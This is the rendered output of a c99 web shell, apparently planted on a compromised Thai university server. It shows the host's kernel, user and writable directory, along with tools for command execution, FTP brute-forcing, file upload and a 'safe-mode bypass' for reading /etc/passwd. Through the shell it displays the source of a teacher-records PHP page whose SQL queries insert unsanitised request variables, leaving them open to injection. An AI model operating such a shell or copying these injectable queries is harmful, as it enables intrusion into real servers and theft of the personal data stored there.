!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/   drwxrwxrwx
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Teacher_Edu_History.php (12.95 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');
    
    
/**  Configuration  */
    
include( "configuration.php" );
    require_once( 
$_Config_absolute_path "/includes/framework.php" );

    
/**  Create Database Object  */
    
$dbObj = new DBConn;
        
    
/**  Config Table for This Page  */
    
$myTable "personal_tb";
    
$myTableFK "Teacher_code";

    
    
$query " SELECT *  FROM $myTable  WHERE Teacher_code='$Teacher_code' ";
    
$result $dbObj->execQuery($query);
    
$rs $dbObj->fetchArray($result);

    
$Img1 str_replace"../"""$rs['Img1'] );
    

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title><?=$_Config_sitename;?> - ข้อมูลฝ่ายวิชาการ - ข้อมูลในหน่วยงาน - ข้อมูลภารงาน</title>
<script type="text/javascript" src="./js/utilities.js"></script>
<link href="./css/default.css" rel="stylesheet" type="text/css" />
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
    
include( "./templates/incHeader.php" );
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="215" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include( "templates/incMainMenuLeft.php" );?></td>
    <td width="788" height="300" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset><table width="770" border="0" cellspacing="0" cellpadding="0">
     <form id="myForm" name="myForm" method="post" action="">
      <tr>
        <td height="5"></td>
      </tr>
      <tr>
        <td height="30" background="images/background/bg-head-topic-w780.gif"><span class="PADDING-LEFT-10"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>&raquo; <a href="PersonalData.php">ข้อมูลฝ่ายวิชาการ</a> &raquo; <a href="Menu_Edu_Faculty.php">ข้อมูลในหน่วยงาน</a> &raquo; <span class="NOTE">ข้อมูลภาระงาน</span></strong></span></td>
        </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td align="center" valign="top"><table width="95%" border="0" align="center" cellpadding="0" cellspacing="0">
              <tr>
                <td width="76%"><table width="100%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#E4E4E4">
                  <tr bordercolor="#E7FAFE">
                    <td height="20" align="left" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><strong>ภาระงาน</strong></td>
                    <td width="10" bgcolor="#FFFFFF">&nbsp;</td>
                    <td width="416" bgcolor="#FFFFFF" class="TEXT-HEADER11-BLUE"><strong><?=$rs['First_name'];?><?=$rs['Teacher_name'];?> &nbsp;<?=$rs['Teacher_lastname'];?></strong></td>
                  </tr>
                  <tr bordercolor="#E7FAFE">
                    <td width="120" height="20" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF">&nbsp;</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF">&nbsp;</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10"><table width="100%" border="0" cellspacing="1" cellpadding="1">
                      <tr>
                        <td width="65%" align="left">&bull; <?php 
                            $sql 
" SELECT *  FROM training_tb  WHERE  Teacher_code='$rs[Teacher_code]' ";
                            
$result6 $dbObj->execQuery($sql);
                            
$numTraining $dbObj->_numrows;
                            
$dbObj->freeresult($result6);
                                if( 
$numTraining ) {
                        
?><a href="showTrainingList.php?Teacher_code=<?php echo $rs['Teacher_code']; ?>&amp;Degree_code=<?=$Degree_code;?>">ประวัติการพัฒนาตนเอง</a><?php } else { ?>ประวัติการพัฒนาตนเอง<?php ?></td>
                        <td width="35%" align="left"><?php echo $numTraining?> ระเบียน</td>
                      </tr>
                      <tr>
                        <td align="left">&bull; <?php 
                        $sql 
" SELECT *  FROM research_tb  WHERE  Teacher_code='$rs[Teacher_code]' ";
                        
$result7 $dbObj->execQuery($sql);
                        
$numResearch $dbObj->_numrows;
                        
$dbObj->freeresult($result7);
                            if( 
$numResearch ) {
                        
?><a href="ResearchList.php?Teacher_code=<?php echo $rs['Teacher_code']; ?>">งานวิจัย</a><?php } else { ?>งานวิจัย<?php ?></td>
                        <td align="left"><?php echo $numResearch?> ระเบียน</td>
                      </tr>
                      <tr>
                        <td align="left">&bull; <?php 
                        $sql 
" SELECT *  FROM edu_product_tb  WHERE  Teacher_code='$rs[Teacher_code]' ";
                        
$result8 $dbObj->execQuery($sql);
                        
$numEduProduct $dbObj->_numrows;
                        
$dbObj->freeresult($result8);
                            if( 
$numEduProduct ) {
                        
?><a href="ProductList.php?Teacher_code=<?php echo $rs['Teacher_code']; ?>">ผลงานวิชาการ</a><?php } else { ?>ผลงานวิชาการ<?php ?></td>
                        <td align="left"><?php echo $numEduProduct?> ระเบียน</td>
                      </tr>
                      <tr>
                        <td align="left">&bull; <?php 
                        $sql 
" SELECT *  FROM committee_tb  WHERE  Teacher_code='$rs[Teacher_code]' ";
                        
$result9 $dbObj->execQuery($sql);
                        
$numCommittee $dbObj->_numrows;
                        
$dbObj->freeresult($result9);
                            if( 
$numCommittee ) { 
                    
?><a href="CommitByYearDetail.php?Teacher_code=<?php echo $rs['Teacher_code']; ?>">งานบริการวิชาการ</a><?php } else { ?>งานบริการวิชาการ<?php ?></td>
                        <td align="left"><?php echo $numCommittee?> ระเบียน</td>
                      </tr>
                      <tr>
                        <td align="left">&bull; <?php 
                        $sql 
" SELECT *  FROM tech_plan_tb  WHERE  Teacher_code='$rs[Teacher_code]' ";
                        
$result10 $dbObj->execQuery($sql);
                        
$numTechPlan $dbObj->_numrows;
                        
$dbObj->freeresult($result10);
                            if( 
$numTechPlan ) { 
                    
?> <a href="PlanList.php?Teacher_code=<?php echo $rs['Teacher_code']; ?>">แผนการสอนรายวิชา</a><?php } else { ?>แผนการสอนรายวิชา<?php ?></td>
                        <td align="left"><?php echo $numTechPlan?> ระเบียน</td>
                      </tr>
                      <tr>
                        <td align="left">&bull; <a href="showClassTeach.php?officerCode=<?php echo $rs['Teacher_id']; ?>">ตารางสอนนักศึกษา</a></td>
                        <td align="left">&nbsp;</td>
                      </tr>
                      <tr>
                        <td align="left">&bull; <a href="StdAdviceList.php?officerId1=<?=$rs['officerId1'];?>">นักศึกษาในความรับผิดชอบ</a></td>
                        <td align="left">&nbsp;</td>
                      </tr>
                    </table></td>
                  </tr>
                  <?php if( $rs['Degree_His2'] != "" ) { ?>
                  <?php 
                      
#if 
                      
if( $rs['Degree_His3'] != "" ) {
                  
?>
                  <?php #if ?>
                  <tr bordercolor="#E7FAFE">
                    <td height="20" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF" class="PADDING-TOP-5">&nbsp;</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF">&nbsp;</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10 PADDING-TOP-5">&nbsp;</td>
                  </tr>
                  <tr bordercolor="#E7FAFE">
                    <td height="20" align="left" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF" class="PADDING-TOP-5"><strong>รายละเอียดอื่นๆ</strong></td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF">&nbsp;</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10 PADDING-TOP-5">&nbsp;</td>
                  </tr>
                  <tr bordercolor="#E7FAFE">
                    <td height="20" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF" class="PADDING-TOP-5">วุฒิการศึกษาสูงสุด</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF">&nbsp;</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10 PADDING-TOP-5"><?php 
                        $Degree_code  
$rs['Degree_code'];
                        
$sql " SELECT *  FROM degree_tb  WHERE  Degree_code='$Degree_code' ";
                        
$result4 $dbObj->execQuery($sql);
                        
$rs4 $dbObj->fetchArray($result4);
                        
$dbObj->freeresult($result4);
                            echo 
$rs4['Degree_name']; 
                    
?></td>
                  </tr>
                  <?php if( $rs['Degree_His1'] != "" ) { ?>
                  <tr bordercolor="#E7FAFE">
                    <td height="20" align="right" valign="top" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF">ปริญญาตรี</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF">&nbsp;</td>
                    <td valign="top" nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10"><?php echo htmlspecialchars_decodenl2br$rs['Degree_His1'] ) ); ?> <?php echo $rs['Year_1']; ?></td>
                  </tr>
                  <?php 
                      
#if 
                    
if( $rs['Degree_His2'] != "" ) { 
                  
?>
                  <tr bordercolor="#E7FAFE">
                    <td height="20" align="right" valign="top" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF">ปริญญาโท</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF">&nbsp;</td>
                    <td valign="top" nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10"><?php echo htmlspecialchars_decodenl2br$rs['Degree_His2'] ) ); ?> <?php echo $rs['Year_2']; ?></td>
                  </tr>
                  <?php 
                      
#if 
                      
if( $rs['Degree_His3'] != "" ) {
                  
?>
                  <tr bordercolor="#E7FAFE">
                    <td height="20" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF">ปริญญาเอก</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF">&nbsp;</td>
                    <td valign="top" nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10"><?php echo htmlspecialchars_decodenl2br$rs['Degree_His3'] ) ); ?> <?php echo $rs['Year_3']; ?></td>
                  </tr>
                  <?php #if ?>
                  <tr bordercolor="#E7FAFE">
                    <td align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF" class="PADDING-TOP-5">ความสามารถพิเศษ</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF">&nbsp;</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10 PADDING-TOP-5"><?php echo htmlspecialchars_decodenl2br$rs['Skill'] ) ); ?></td>
                  </tr>
                  <tr bordercolor="#E7FAFE">
                    <td height="20" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF" class="PADDING-TOP-5">สังกัดหน่วยงาน</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF">&nbsp;</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10 PADDING-TOP-5"><?php 
                        $sql 
" SELECT *  FROM faculty_tb  WHERE  Faculty_code='$rs[Faculty_code]' ";
                        
$result5 $dbObj->execQuery($sql);
                        
$rs5 $dbObj->fetchArray($result5);
                        
$dbObj->freeresult($result5);
                            echo 
$rs5['Faculty_name']; 
                    
?></td>
                  </tr>
                  <tr bordercolor="#E7FAFE">
                    <td align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF">&nbsp;</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF">&nbsp;</td>
                    <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">&nbsp;</td>
                  </tr>
                 </table>
                  <table width="100%" border="0" cellspacing="0" cellpadding="0">
                    <tr>
                      <td>&nbsp;</td>
                    </tr>
                    <tr>
                      <td align="center"><input type="button" name="button" id="button" value="&laquo; ย้อนกลับ" class="CURSOR-HAND" onclick="window.history.back();" /></td>
                    </tr>
                  </table></td>
                <td width="24%" valign="top" align="center"><table width="150" border="0" cellspacing="0" cellpadding="0">
                  <tr>
                    <td><img src="<?php echo $Img1?>" width="150" height="170" /></td>
                  </tr>
                </table></td>
              </tr>
            </table></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr></form>
    </table>
    </fieldset></td>
  </tr>
</table>
<?php include( "./templates/incFooter.php" ); ?>
</body>
</html>
<?php
    
/**  Free Resource */
    
$dbObj->freeresult($result);

    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0188 ]--